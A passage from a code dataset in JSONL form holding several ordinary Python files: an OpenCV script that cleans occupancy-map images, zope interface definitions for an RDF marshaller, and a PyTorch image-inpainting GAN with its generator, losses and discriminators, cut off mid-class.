zodiac_name}\nprint(z_num)\n","sub_path":"Section2/lesson18.py","file_name":"lesson18.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"517711253","text":"#!/usr/bin/env python\nimport numpy as np\nimport cv2\nimport ICP\n\n\ndef start():\n img = cv2.imread('/home/rauf/Desktop/MAPS/test_gmapping.pgm',-1)\n img[img == 205] = 255\n kernel = np.ones((7,7), np.uint8)\n erosion = cv2.erode(img, kernel, iterations = 1)\n blur = cv2.GaussianBlur(erosion,(5,5),0)\n canny = cv2.Canny(blur, 50, 120)\n small_img = cv2.resize(blur, (0,0), fx=0.2, fy=0.2)\n cv2.imshow('image',blur)\n cv2.imshow('small_image',small_img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n start()\n","sub_path":"plato_map_comparison/remove_unknown.py","file_name":"remove_unknown.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"217087060","text":"\"\"\" Interfaces \"\"\"\nfrom zope.interface import Interface, Attribute\n\n\nclass ISurfSession(Interface):\n \"\"\"The surf.Session objects\"\"\"\n\n\nclass IObject2Surf(Interface):\n \"\"\" An object that writes surf info into a ISurfSession\n \"\"\"\n\n def write():\n \"\"\"Add the surf resource info into the session \"\"\"\n\n\nclass IGenericObject2Surf(IObject2Surf):\n \"\"\" An implementation of IObject2Surf\n\n This interface is only used to describe the GenericObject2Surf\n class; The IObject2Surf interface should be used as adapter interface\n \"\"\"\n\n resource = Attribute(u\"A surf resource that is written into the sesion\")\n namespace = Attribute(u\"The namespace that is attached to the resource\")\n subject = Attribute(u\"The subject (URI) of the resource\")\n prefix = Attribute(u\"The subject (URI) of the resource\")\n portalType = Attribute(u\"The portal type of the context, \"\n u\"will be used as resource class\")\n rdfId = Attribute(u\"The Id of the resource\")\n\n def modify_resource(resource, *args, **kwds):\n \"\"\"Override to modify the resource and return a new one\n \"\"\"\n\n\nclass ISurfResourceModifier(Interface):\n \"\"\"Plugins that can modify the saved resource for a given context\n \"\"\"\n\n def run(resource):\n \"\"\"Gets the rdf resource as argument, to allow it to be changed in place\n \"\"\"\n","sub_path":"eea/rdfmarshaller/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"477807369","text":"from torchvision import models\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F \nimport functools \nfrom torch.autograd import Variable \nimport numpy as np \n\n\n############################################################\n### Functions\n############################################################\ndef weights_init(m):\n classname = m.__class__.__name__\n if hasattr(m, 'weight') and classname.find('Conv2d') != -1:\n nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in') \n m.weight.data *= 0.1\n if m.bias is not None:\n m.bias.data.zero_()\n elif classname.find('BatchNorm2d') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n elif classname.find('ConvTranspose2d') != -1: \n m.weight.data.normal_(0.0, 0.02)\n if m.bias is not None:\n m.bias.data.zero_() \n elif classname.find('Linear') != -1:\n m.weight.data.normal_(0.0, 0.01)\n if m.bias is not None:\n m.bias.data.zero_() \n\ndef get_norm_layer(norm_type='instance'):\n if norm_type == 'batch':\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True)\n elif norm_type == 'instance':\n norm_layer = functools.partial(nn.InstanceNorm2d, affine=False)\n else:\n raise NotImplementedError('normalization layer [%s] is not found' % norm_type) \n return norm_layer \n\ndef print_network(net):\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params) \n print('--------------------------------------------------------------') \n return num_params \n\ndef define_G(input_nc, output_nc, ngf, n_downsample_global=3, n_blocks_global=9, norm='instance', gpu_ids=[]): \n netG = ImageTinker2(input_nc, output_nc, ngf=64, n_downsampling=4, n_blocks=4, norm_layer=nn.BatchNorm2d, pad_type='replicate') \n \n num_params = print_network(netG) \n\n if len(gpu_ids) > 0:\n assert(torch.cuda.is_available())\n netG.cuda(gpu_ids[0]) \n netG.apply(weights_init) \n\n return netG, num_params \n\ndef define_D(input_nc, ndf, n_layers_D, norm='instance', use_sigmoid=False, num_D=1, getIntermFeat=False, gpu_ids=[]): \n norm_layer = get_norm_layer(norm_type=norm) \n netD = MultiscaleDiscriminator(input_nc, ndf, n_layers_D, norm_layer, use_sigmoid, num_D, getIntermFeat) \n num_params = print_network(netD) \n\n if len(gpu_ids) > 0:\n assert(torch.cuda.is_available())\n netD.cuda(gpu_ids[0]) \n netD.apply(weights_init) \n\n return netD, num_params \n\nclass ImageTinker2(nn.Module): \n def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=4, n_blocks=4, norm_layer=nn.InstanceNorm2d, pad_type='replicate', activation=nn.LeakyReLU(0.2, True)): \n assert(n_blocks >= 0)\n super(ImageTinker2, self).__init__() \n\n if pad_type == 'reflect':\n self.pad = nn.ReflectionPad2d \n elif pad_type == 'zero': \n self.pad = nn.ZeroPad2d \n elif pad_type == 'replicate':\n self.pad = nn.ReplicationPad2d \n\n # LR coarse tinker (encoder) \n lr_coarse_tinker = [self.pad(3), nn.Conv2d(input_nc, ngf // 2, kernel_size=7, stride=1, padding=0), activation] \n lr_coarse_tinker += [self.pad(1), nn.Conv2d(ngf // 2, ngf, kernel_size=4, stride=2, padding=0), activation] \n lr_coarse_tinker += [self.pad(1), nn.Conv2d(ngf, ngf * 2, kernel_size=4, stride=2, padding=0), activation] \n lr_coarse_tinker += [self.pad(1), nn.Conv2d(ngf * 2, ngf * 4, kernel_size=4, stride=2, padding=0), activation] \n # bottle neck\n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n # decoder \n lr_coarse_tinker += [nn.UpsamplingBilinear2d(scale_factor=2), self.pad(1), nn.Conv2d(ngf * 4, ngf * 2, kernel_size=3, stride=1, padding=0), activation] \n lr_coarse_tinker += [nn.UpsamplingBilinear2d(scale_factor=2), self.pad(1), nn.Conv2d(ngf * 2, ngf, kernel_size=3, stride=1, padding=0), activation] \n lr_coarse_tinker += [nn.UpsamplingBilinear2d(scale_factor=2), self.pad(1), nn.Conv2d(ngf, ngf // 2, kernel_size=3, stride=1, padding=0), activation] \n lr_coarse_tinker += [self.pad(3), nn.Conv2d(ngf // 2, output_nc, kernel_size=7, stride=1, padding=0)] \n ### get a coarse (256x256x3) \n self.lr_coarse_tinker = nn.Sequential(*lr_coarse_tinker) \n\n self.r_en_padd1 = self.pad(3) \n self.r_en_conv1 = nn.Conv2d(input_nc, ngf // 2, kernel_size=7, stride=1, padding=0) \n self.r_en_acti1 = activation \n\n self.r_en_padd2 = self.pad(1) \n self.r_en_conv2 = nn.Conv2d(ngf // 2, ngf, kernel_size=4, stride=2, padding=0) \n self.r_en_acti2 = activation \n\n self.r_en_padd3 = self.pad(1) \n self.r_en_conv3 = nn.Conv2d(ngf, ngf * 2, kernel_size=4, stride=2, padding=0) \n self.r_en_acti3 = activation \n\n self.r_en_skp_padd3 = self.pad(1) \n self.r_en_skp_conv3 = nn.Conv2d(ngf * 2, ngf * 2 // 2, kernel_size=3, stride=1, padding=0) \n self.r_en_skp_acti3 = activation \n\n self.r_en_padd4 = self.pad(1) \n self.r_en_conv4 = nn.Conv2d(ngf * 2, ngf * 4, kernel_size=4, stride=2, padding=0) \n self.r_en_acti4 = activation \n\n self.r_en_skp_padd4 = self.pad(1) \n self.r_en_skp_conv4 = nn.Conv2d(ngf * 4, ngf * 4 // 2, kernel_size=3, stride=1, padding=0) \n self.r_en_skp_acti4 = activation \n\n self.r_en_padd5 = self.pad(1) \n self.r_en_conv5 = nn.Conv2d(ngf * 4, ngf * 8, kernel_size=4, stride=2, padding=0) \n self.r_en_acti5 = activation \n\n self.r_md_mres1 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_mres2 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_mres5 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_satn1 = NonLocalBlock(ngf * 8, sub_sample=False, bn_layer=False) \n self.r_md_mres3 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_mres4 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_mres6 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n\n self.r_de_upbi1 = nn.UpsamplingBilinear2d(scale_factor=2) \n self.r_de_padd1 = self.pad(1) \n self.r_de_conv1 = nn.Conv2d(ngf * 8, ngf * 4, kernel_size=3, stride=1, padding=0) \n self.r_de_acti1 = activation \n\n self.r_de_satn2 = NonLocalBlock(ngf * 4 // 2, sub_sample=False, bn_layer=False) \n self.r_de_satn3 = NonLocalBlock(ngf * 2 // 2, sub_sample=False, bn_layer=False) \n\n self.r_de_mix_padd1 = self.pad(1) \n self.r_de_mix_conv1 = nn.Conv2d(ngf * 4 + ngf * 4 // 2, ngf * 4, kernel_size=3, stride=1, padding=0) \n self.r_de_mix_acti1 = activation \n\n self.r_de_upbi2 = nn.UpsamplingBilinear2d(scale_factor=2) \n self.r_de_padd2 = self.pad(1) \n self.r_de_conv2 = nn.Conv2d(ngf * 4, ngf * 2, kernel_size=3, stride=1, padding=0) \n self.r_de_acti2 = activation \n\n self.r_de_mix_padd2 = self.pad(1) \n self.r_de_mix_conv2 = nn.Conv2d(ngf * 2 + ngf * 2 // 2, ngf * 2, kernel_size=3, stride=1, padding=0) \n self.r_de_mix_acti2 = activation \n\n self.r_de_padd2_lr = self.pad(1) \n self.r_de_conv2_lr = nn.Conv2d(ngf * 2, ngf // 2, kernel_size=3, stride=1, padding=0) \n self.r_de_acti2_lr = activation \n\n self.r_de_padd3_lr = self.pad(1) \n self.r_de_conv3_lr = nn.Conv2d(ngf // 2, output_nc, kernel_size=3, stride=1, padding=0) \n\n self.r_de_upbi3 = nn.UpsamplingBilinear2d(scale_factor=2) \n self.r_de_padd3 = self.pad(1) \n self.r_de_conv3 = nn.Conv2d(ngf * 2, ngf, kernel_size=3, stride=1, padding=0) \n self.r_de_acti3 = activation \n\n self.r_de_upbi4 = nn.UpsamplingBilinear2d(scale_factor=2) \n self.r_de_padd4 = self.pad(1) \n self.r_de_conv4 = nn.Conv2d(ngf, ngf // 2, kernel_size=3, stride=1, padding=0) \n self.r_de_acti4 = activation \n\n self.r_de_padd5 = self.pad(3) \n self.r_de_conv5 = nn.Conv2d(ngf // 2, output_nc, kernel_size=7, stride=1, padding=0) \n\n self.r_de_padd5_lr_alpha = self.pad(1) \n self.r_de_conv5_lr_alpha = nn.Conv2d(ngf // 2, 1, kernel_size=3, stride=1, padding=0) \n self.r_de_acti5_lr_alpha = nn.Sigmoid() \n\n self.up = nn.UpsamplingBilinear2d(scale_factor=4)\n self.down = nn.UpsamplingBilinear2d(scale_factor=0.25) \n\n def forward(self, msked_img, msk, real_img=None): \n if real_img is not None: \n rimg = real_img \n inp = real_img * (1 - msk) + msk \n else:\n rimg = msked_img \n inp = msked_img \n \n x = torch.cat((inp, msk), dim=1) \n lr_x = self.lr_coarse_tinker(x) \n hr_x = lr_x * msk + rimg * (1 - msk) \n\n y = torch.cat((hr_x, msk), dim=1) \n e1 = self.r_en_acti1(self.r_en_conv1(self.r_en_padd1(y))) \n e2 = self.r_en_acti2(self.r_en_conv2(self.r_en_padd2(e1))) \n e3 = self.r_en_acti3(self.r_en_conv3(self.r_en_padd3(e2))) \n e4 = self.r_en_acti4(self.r_en_conv4(self.r_en_padd4(e3))) \n e5 = self.r_en_acti5(self.r_en_conv5(self.r_en_padd5(e4))) \n\n skp_e3 = self.r_en_skp_acti3(self.r_en_skp_conv3(self.r_en_skp_padd3(e3)))\n skp_e4 = self.r_en_skp_acti4(self.r_en_skp_conv4(self.r_en_skp_padd4(e4))) \n\n de3 = self.r_de_satn3(skp_e3) \n de4 = self.r_de_satn2(skp_e4) \n\n m1 = self.r_md_mres1(e5)\n m2 = self.r_md_mres2(m1) \n m5 = self.r_md_mres5(m2)\n a1 = self.r_md_satn1(m5)\n m3 = self.r_md_mres3(a1)\n m4 = self.r_md_mres4(m3) \n m6 = self.r_md_mres6(m4)\n\n d1 = self.r_de_acti1(self.r_de_conv1((self.r_de_padd1(self.r_de_upbi1(m6))))) # 32x32x256\n cat1 = torch.cat((d1, de4), dim=1) \n md1 = self.r_de_mix_acti1(self.r_de_mix_conv1(self.r_de_mix_padd1(cat1))) \n\n d2 = self.r_de_acti2(self.r_de_conv2((self.r_de_padd2(self.r_de_upbi2(md1))))) # 64x64x128\n cat2 = torch.cat((d2, de3), dim=1) \n md2 = self.r_de_mix_acti2(self.r_de_mix_conv2(self.r_de_mix_padd2(cat2))) \n\n d2_lr = self.r_de_acti2_lr(self.r_de_conv2_lr(self.r_de_padd2_lr(md2))) \n d3_lr = self.r_de_conv3_lr(self.r_de_padd3_lr(d2_lr))\n\n d3 = self.r_de_acti3(self.r_de_conv3((self.r_de_padd3(self.r_de_upbi3(md2))))) # 128x128x64\n d4 = self.r_de_acti4(self.r_de_conv4((self.r_de_padd4(self.r_de_upbi4(d3))))) # 256x256x32\n\n d5 = self.r_de_conv5(self.r_de_padd5(d4)) \n d5_lr_alpha = self.r_de_acti5_lr_alpha(self.r_de_conv5_lr_alpha(self.r_de_padd5_lr_alpha(d4))) \n\n ###\n # d5: 256x256x3 \n # d5_lr_alpha: 256x256x1\n # d3_lr: 64x64x3\n ###\n lr_img = d3_lr\n \n #reconst_img = d5\n d5 = d5 * msk + rimg * (1 - msk)\n lr_d5 = self.down(d5)\n lr_d5_res = d3_lr - lr_d5 \n hr_d5_res = self.up(lr_d5_res) \n reconst_img = d5 + hr_d5_res * d5_lr_alpha \n compltd_img = reconst_img * msk + rimg * (1 - msk) \n #out = compltd_img + hr_d5_res * d5_lr_alpha \n\n return compltd_img, reconst_img, lr_x, lr_img \n\n\n############################################################\n### Losses\n############################################################\nclass TVLoss(nn.Module):\n def forward(self, x):\n batch_size = x.size()[0]\n h_x = x.size()[2]\n w_x = x.size()[3]\n count_h = self._tensor_size(x[:, :, 1:, :])\n count_w = self._tensor_size(x[:, :, :, 1:])\n h_tv = torch.pow((x[:, :, 1:, :] - x[:, :, :h_x - 1, :]), 2).sum()\n w_tv = torch.pow((x[:, :, :, 1:] - x[:, :, :, :w_x - 1]), 2).sum()\n return 2 * (h_tv / count_h + w_tv / count_w) / batch_size\n\n def _tensor_size(self, t):\n return t.size()[1] * t.size()[2] * t.size()[3] \n\nclass VGGLoss(nn.Module):\n # vgg19 perceptual loss\n def __init__(self, gpu_ids):\n super(VGGLoss, self).__init__()\n self.vgg = Vgg19().cuda()\n self.criterion = nn.L1Loss()\n self.mse_loss = nn.MSELoss() \n\n self.weights = [1.0/32, 1.0/16, 1.0/8, 1.0/4, 1.0]\n mean = torch.Tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1).cuda() \n std = torch.Tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1).cuda() \n self.register_buffer('mean', mean)\n self.register_buffer('std', std)\n\n def gram_matrix(self, x):\n (b, ch, h, w) = x.size() \n features = x.view(b, ch, w*h) \n features_t = features.transpose(1, 2) \n gram = features.bmm(features_t) / (ch * h * w) \n return gram \n\n def forward(self, x, y):\n x = (x - self.mean) / self.std \n y = (y - self.mean) / self.std \n x_vgg, y_vgg = self.vgg(x), self.vgg(y)\n\n loss = 0\n style_loss = 0\n for i in range(len(x_vgg)):\n loss += self.weights[i] * \\\n self.criterion(x_vgg[i], y_vgg[i].detach())\n gm_x = self.gram_matrix(x_vgg[i]) \n gm_y = self.gram_matrix(y_vgg[i]) \n style_loss += self.weights[i] * self.mse_loss(gm_x, gm_y.detach()) \n return loss, style_loss \n\nclass GANLoss_D_v2(nn.Module): \n def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0, tensor=torch.FloatTensor): \n super(GANLoss_D_v2, self).__init__() \n self.real_label = target_real_label \n self.fake_label = target_fake_label \n self.real_label_var = None \n self.fake_label_var = None \n self.Tensor = tensor \n if use_lsgan: \n self.loss = nn.MSELoss() \n else:\n def wgan_loss(input, target):\n return torch.mean(F.relu(1.-input)) if target else torch.mean(F.relu(1.+input)) \n self.loss = wgan_loss \n \n def get_target_tensor(self, input, target_is_real): \n target_tensor = None \n if target_is_real: \n create_label = ((self.real_label_var is None) or (self.real_label_var.numel() != input.numel()))\n if create_label:\n real_tensor = self.Tensor(input.size()).fill_(self.real_label) \n self.real_label_var = Variable(real_tensor, requires_grad=False) \n target_tensor = self.real_label_var \n else:\n create_label = ((self.fake_label_var is None) or (self.fake_label_var.numel() != input.numel())) \n if create_label:\n fake_tensor = self.Tensor(input.size()).fill_(self.fake_label) \n self.fake_label_var = Variable(fake_tensor, requires_grad=False) \n target_tensor = self.fake_label_var \n return target_tensor \n \n def __call__(self, input, target_is_real): \n if isinstance(input[0], list): \n loss = 0\n for input_i in input:\n pred = input_i[-1] \n target_tensor = self.get_target_tensor(pred, target_is_real) \n #loss += self.loss(pred, target_tensor) \n loss += self.loss(pred, target_is_real) \n return loss \n else:\n target_tensor = self.get_target_tensor(input[-1], target_is_real) \n return self.loss(input[-1], target_tensor) \n\nclass GANLoss_G_v2(nn.Module): \n def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0, tensor=torch.FloatTensor): \n super(GANLoss_G_v2, self).__init__() \n self.real_label = target_real_label \n self.fake_label = target_fake_label \n self.real_label_var = None \n self.fake_label_var = None \n self.Tensor = tensor \n if use_lsgan: \n self.loss = nn.MSELoss() \n else:\n def wgan_loss(input, target):\n return -1 * input.mean() if target else input.mean() \n self.loss = wgan_loss \n \n def get_target_tensor(self, input, target_is_real): \n target_tensor = None \n if target_is_real: \n create_label = ((self.real_label_var is None) or (self.real_label_var.numel() != input.numel()))\n if create_label:\n real_tensor = self.Tensor(input.size()).fill_(self.real_label) \n self.real_label_var = Variable(real_tensor, requires_grad=False) \n target_tensor = self.real_label_var \n else:\n create_label = ((self.fake_label_var is None) or (self.fake_label_var.numel() != input.numel())) \n if create_label:\n fake_tensor = self.Tensor(input.size()).fill_(self.fake_label) \n self.fake_label_var = Variable(fake_tensor, requires_grad=False) \n target_tensor = self.fake_label_var \n return target_tensor \n \n def __call__(self, input, target_is_real): \n if isinstance(input[0], list): \n loss = 0\n for input_i in input:\n pred = input_i[-1] \n target_tensor = self.get_target_tensor(pred, target_is_real) \n #loss += self.loss(pred, target_tensor) \n loss += self.loss(pred, target_is_real)\n return loss \n else:\n target_tensor = self.get_target_tensor(input[-1], target_is_real) \n return self.loss(input[-1], target_tensor) \n\n\n# Define the PatchGAN discriminator with the specified arguments. \nclass NLayerDiscriminator(nn.Module): \n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.InstanceNorm2d, use_sigmoid=False, getIntermFeat=False): \n super(NLayerDiscriminator, self).__init__() \n self.getIntermFeat = getIntermFeat \n self.n_layers = n_layers \n \n kw = 4\n padw = int(np.ceil((kw-1.0)/2)) \n sequence = [[SpectralNorm(nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw)), nn.LeakyReLU(0.2, True)]] \n \n nf = ndf \n for n in range(1, n_layers): \n nf_prev = nf \n nf = min(nf * 2, 512) \n sequence += [[\n SpectralNorm(nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw)), \n nn.LeakyReLU(0.2, True) \n ]] \n \n nf_prev = nf \n nf = min(nf * 2, 512) \n sequence += [[\n SpectralNorm(nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=1, padding=padw)), \n nn.LeakyReLU(0.2, True) \n ]] \n \n sequence += [[SpectralNorm(nn.Conv2d(nf, nf, kernel_size=kw, stride=1, padding=padw))]]\n \n # if use_sigmoid: \n # sequence += [[nn.Sigmoid()]] \n \n if getIntermFeat:\n for n in range(len(sequence)):\n setattr(self, 'model'+str(n), nn.Sequential(*sequence[n])) \n else: \n sequence_stream = [] \n for n in range(len(sequence)):\n sequence_stream += sequence[n] \n self.model = nn.Sequential(*sequence_stream)\n \n def forward(self, input): \n if self.getIntermFeat:\n res = [input] \n for n in range(self.n_layers + 2):\n model = getattr(self, 'model'+str(n)) \n res.append(model(res[-1])) \n return res[1:]\n else:\n return self.model(input) \n\n\n# Define the Multiscale Discriminator. \nclass MultiscaleDiscriminator(nn.Module): \n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, use_sigmoid=False, num_D=3, getIntermFeat=False): \n super(MultiscaleDiscriminator, self).__init__() \n self.num_D = num_D \n self.n_layers = n_layers \n self.getIntermFeat = getIntermFeat \n \n for i in range(num_D): \n netD = NLayerDiscriminator(input_nc, ndf, n_layers, norm_layer, use_sigmoid, getIntermFeat) \n if getIntermFeat: \n for j in range(n_layers+2): \n setattr(self, 'scale'+str(i)+'_layer'+str(j), getattr(netD, 'model'+str(j))) \n else:\n setattr(self, 'layer'+str(i), netD.model) \n \n self.downsample = nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False) \n \n def singleD_forward(self, model, input):\n if self.getIntermFeat:\n result = [input] \n for i in range(len(model)):\n result.append(model[i](result[-1])) \n return result[1:]\n else:\n return [model(input)] \n \n def forward(self, input): \n num_D = self.num_D \n result = [] \n input_downsampled = input \n for i in range(num_D):\n if self.getIntermFeat: \n model = [getattr(self, 'scale'+str(num_D-1-i)+'_layer'+str(j)) for j in range(self.n_layers+2)] \n else: \n model = getattr(self, 'layer'+str(num_D-1-i)) \n result.append(self.singleD_forward(model, input_downsampled)) \n if i != (num_D-1):\n input_downsampled = self.downsample(input_downsampled) \n return result \n \n \n### Define Vgg19 for vgg_loss \nclass Vgg19(nn.Module):\n def __init__(self, requires_grad=False):\n super(Vgg19, self).__init__()\n vgg_pretrained_features = models.vgg19(pretrained=True).features\n self.slice1 = nn.Sequential()\n self.slice2 = nn.Sequential()\n self.slice3 = nn.Sequential()\n self.slice4 = nn.Sequential()\n self.slice5 = nn.Sequential()\n\n for x in range(1):\n self.slice1.add_module(str(x), vgg_pretrained_features[x])\n for x in range(1, 6):\n self.slice2.add_module(str(x), vgg_pretrained_features[x])\n for x in range(6, 11):\n self.slice3.add_module(str(x), vgg_pretrained_features[x])\n for x in range(11, 20):\n self.slice4.add_module(str(x), vgg_pretrained_features[x])\n for x in range(20, 29):\n self.slice5.add_module(str(x), vgg_pretrained_features[x])\n\n # fixed pretrained vgg19 model for feature extraction\n if not requires_grad:\n for param in self.parameters():\n param.requires_grad = False\n\n def forward(self, x):\n h_relu1 = self.slice1(x)\n h_relu2 = self.slice2(h_relu1)\n h_relu3 = self.slice3(h_relu2)\n h_relu4 = self.slice4(h_relu3)\n h_relu5 = self.slice5(h_relu4)\n out = [h_relu1, h_relu2, h_relu3, h_relu4, h_relu5]\n return out \n\n### Multi-Dilation ResnetBlock\nclass MultiDilationResnetBlock(nn.Module): \n def __init__(self, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti='relu', use_dropout=False): \n super(MultiDilationResnetBlock, self).__init__() \n\n self.branch1 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=2, dilation=2, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch2 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=3, dilation=3, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch3 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=4, dilation=4, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch4 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=5, dilation=5, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch5 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=6, dilation=6, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch6 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=8, dilation=8, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch7 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=10, dilation=10, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch8 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n\n self.fusion9 = ConvBlock(input_nc, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type=pad_type, norm=norm, acti=None) \n\n def forward(self, x):\n d1 = self.branch1(x) \n d2 = self.branch2(x) \n d3 = self.branch3(x) \n d4 = self.branch4(x) \n d5 = self.branch5(x) \n d6 = self.branch6(x) \n d7 = self.branch7(x) \n d8 = self.branch8(x) \n d9 = torch.cat((d1, d2, d3, d4, d5, d6, d7, d8), dim=1) \n out = x + self.fusion9(d9) \n return out \n\n### Multi-Dilation ResnetBlock\nclass MultiDilationResnetBlock_v3(nn.Module): \n def __init__(self, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti='relu', use_dropout=False): \n super(MultiDilationResnetBlock_v3, self).__init__() \n\n self.branch1 = ConvBlock(input_nc, input_nc // 4, kernel_size=3, stride=1, padding=2, dilation=2, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch2 = ConvBlock(input_nc, input_nc // 4, kernel_size=3, stride=1, padding=3, dilation=3, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch3 = ConvBlock(input_nc, input_nc // 4, kernel_size=3, stride=1, padding=4, dilation=4, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch4 = ConvBlock(input_nc, input_nc // 4, kernel_size=3, stride=1, padding=5, dilation=5, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n \n self.fusion5 = ConvBlock(input_nc, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type=pad_type, norm=norm, acti=None) \n\n def forward(self, x):\n d1 = self.branch1(x) \n d2 = self.branch2(x) \n d3 = self.branch3(x) \n d4 = self.branch4(x) \n d5 = torch.cat((d1, d2, d3, d4), dim=1) \n out = x + self.fusion5(d5) \n return out \n\n### ResnetBlock\nclass ResnetBlock(nn.Module): \n def __init__(self, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti='relu', use_dropout=False): \n super(ResnetBlock, self).__init__() \n self.conv_block = self.build_conv_block(input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti, use_dropout)\n\n\n def build_conv_block(self, input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti, use_dropout):\n conv_block = [] \n conv_block += [ConvBlock(input_nc, input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti='relu')]\n if use_dropout:\n conv_block += [nn.Dropout(0.5)] \n conv_block += [ConvBlock(input_nc, input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti=None)] \n\n return nn.Sequential(*conv_block) \n\n def forward(self, x):\n out = x + self.conv_block(x) \n return out \n\n### ResnetBlock\nclass ResnetBlock_v2(nn.Module): \n def __init__(self, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti='relu', use_dropout=False): \n super(ResnetBlock_v2, self).__init__() \n self.conv_block = self.build_conv_block(input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti, use_dropout)\n\n\n def build_conv_block(self, input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti, use_dropout):\n conv_block = [] \n conv_block += [ConvBlock(input_nc, input_nc, kernel_size=3, stride=1, padding=padding, dilation=dilation, groups=groups, bias=bias, pad_type=pad_type, norm=norm, acti='elu')]\n if use_dropout:\n conv_block += [nn.Dropout(0.5)] \n conv_block += [ConvBlock(input_nc, input_nc, kernel_size=1, stride=1, padding=0, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti=None)] \n\n return nn.Sequential(*conv_block) \n\n def forward(self, x):\n out = x + self.conv_block(x) \n return out \n\n### NonLocalBlock2D \nclass NonLocalBlock(nn.Module): \n def __init__(self, input_nc, inter_nc=None, sub_sample=True, bn_layer=True): \n super(NonLocalBlock, self).__init__() \n self.input_nc = input_nc \n self.inter_nc = inter_nc \n\n if inter_nc is None: \n self.inter_nc = input_nc 